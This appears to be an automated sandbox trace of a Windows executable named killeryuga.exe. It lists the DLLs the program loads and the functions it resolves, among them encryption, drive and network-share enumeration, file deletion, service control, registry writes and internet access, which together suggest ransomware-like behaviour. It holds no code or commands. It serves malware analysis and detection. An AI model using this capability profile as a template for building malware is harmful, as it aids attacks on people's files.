System Get Time type = System Time, time = 2019-03-24 16:36:12 (UTC) True 1
Fn
System Get Time type = Ticks, time = 95488 True 1
Fn
System Get Time type = Performance Ctr, time = 14672507109 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76c3359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\killeryuga.exe, size = 260 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x76c579f9 True 1
System Get Info type = Hardware Information True 249
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76c349d7 True 1
Module Load module_name = kernel32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76c3435f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76c33519 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
System Get Info type = Operating System True 1
Module Load module_name = RPCRT4.dll, base_address = 0x75ee0000 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x75f23fc5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75f5d918 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x75f21ee5 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x75f01635 True 1
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x75eff48b True 1
Module Load module_name = MPR.dll, base_address = 0x74b50000 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x74b53058 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x74b52f06 True 1
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x74b52dd6 True 1
Module Load module_name = WININET.dll, base_address = 0x753d0000 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x753eab49 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x753f9197 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x753eb406 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x753f5c75 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x754130f1 True 1
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x753ff18e True 1
Module Load module_name = WINMM.dll, base_address = 0x74b10000 True 1
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74b126e0 True 1
Module Load module_name = SHLWAPI.dll, base_address = 0x75340000 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x753545bf True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7537ad1a True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7535bb71 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7535a1b9 True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7534d65e True 1
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x753581ef True 1
Module Load module_name = KERNEL32.dll, base_address = 0x76c20000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x76c4ce46 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x76c35223 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x76c353c6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x76c34435 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x76c317d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x76c35a4b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x76c31b00 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x76c3103d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x76c34259 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76c31136 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x76c35371 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76c3186e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76c31986 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x76c3588e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x76c35063 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x76c3492b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x76c5830d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x76c34620 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x76c5d556 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x76c31072 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x76c33ed3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76c33f5c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x76c52b7a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x76c35929 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76c3469b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x76c5594d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76c31856 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x76c49af0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x76c58baf True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76c3168c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x76c3183e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x76c5896c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x76c5828e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x76c34c6b True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76c31410 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x76c389b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x76c32d3c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x76c53102 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x76c35444 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x76c52a9d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x76c35558 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x76c34467 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x76c3110c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76c31946 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77163002 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x76c534d7 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x76c33bca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76c317b9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76cd7bff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76c31328 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77171f6e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76cb454f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76c33531 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x76cb4691 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76c314e9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x76c317ec True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76c35189 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77170fcb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76c34493 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x74f57136 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74fafd1e True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x74f605ba True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x74f58bff True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x74fafd3f True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Module Load module_name = ADVAPI32.dll, base_address = 0x74d40000 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x74d5369c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74d5157a True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x74d4df36 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74d514d6 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74d5469d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ControlService, address_out = 0x74d67144 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenServiceW, address_out = 0x74d4ca4c True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x74d4df4e True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74d6779b True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74d4c532 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74d546ad True 1
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Module Load module_name = SHELL32.dll, base_address = 0x75fd0000 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76217078 True 1
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Module Load module_name = ole32.dll, base_address = 0x755e0000 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitialize, address_out = 0x755fb636 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeSecurity, address_out = 0x75607259 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x756286d3 True 1
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75629d0b True 1
Module Load module_name = OLEAUT32.dll, base_address = 0x75220000 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x75223eae True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 8, address_out = 0x75223ed5 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 12, address_out = 0x75225dee True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 201, address_out = 0x75224af8 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 6, address_out = 0x75223e59 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 200, address_out = 0x75223f21 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 2, address_out = 0x75224642 True 1
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = 202, address_out = 0x7522fd6b True 1
Module Load module_name = IPHLPAPI.DLL, base_address = 0x74af0000 True 1
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x74af9263 True 1
Module Load module_name = WS2_32.dll, base_address = 0x75bc0000 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 11, address_out = 0x75bc311b True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x75bd7673 True 1
Module Get Address module_name = c:\windows\syswow64\ws2_32.dll, function = 12, address_out = 0x75bcb131 True 1
Module Load module_name = DNSAPI.dll, base_address = 0x74a90000 True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsFree, address_out = 0x74a9436b True 1
Module Get Address module_name = c:\windows\syswow64\dnsapi.dll, function = DnsQuery_W, address_out = 0x74aa572c True 1
Module Load module_name = CRYPT32.dll, base_address = 0x759b0000 True 1
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Module Load module_name = msvcr100.dll, base_address = 0x749d0000 True 1
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749ec544 True 1
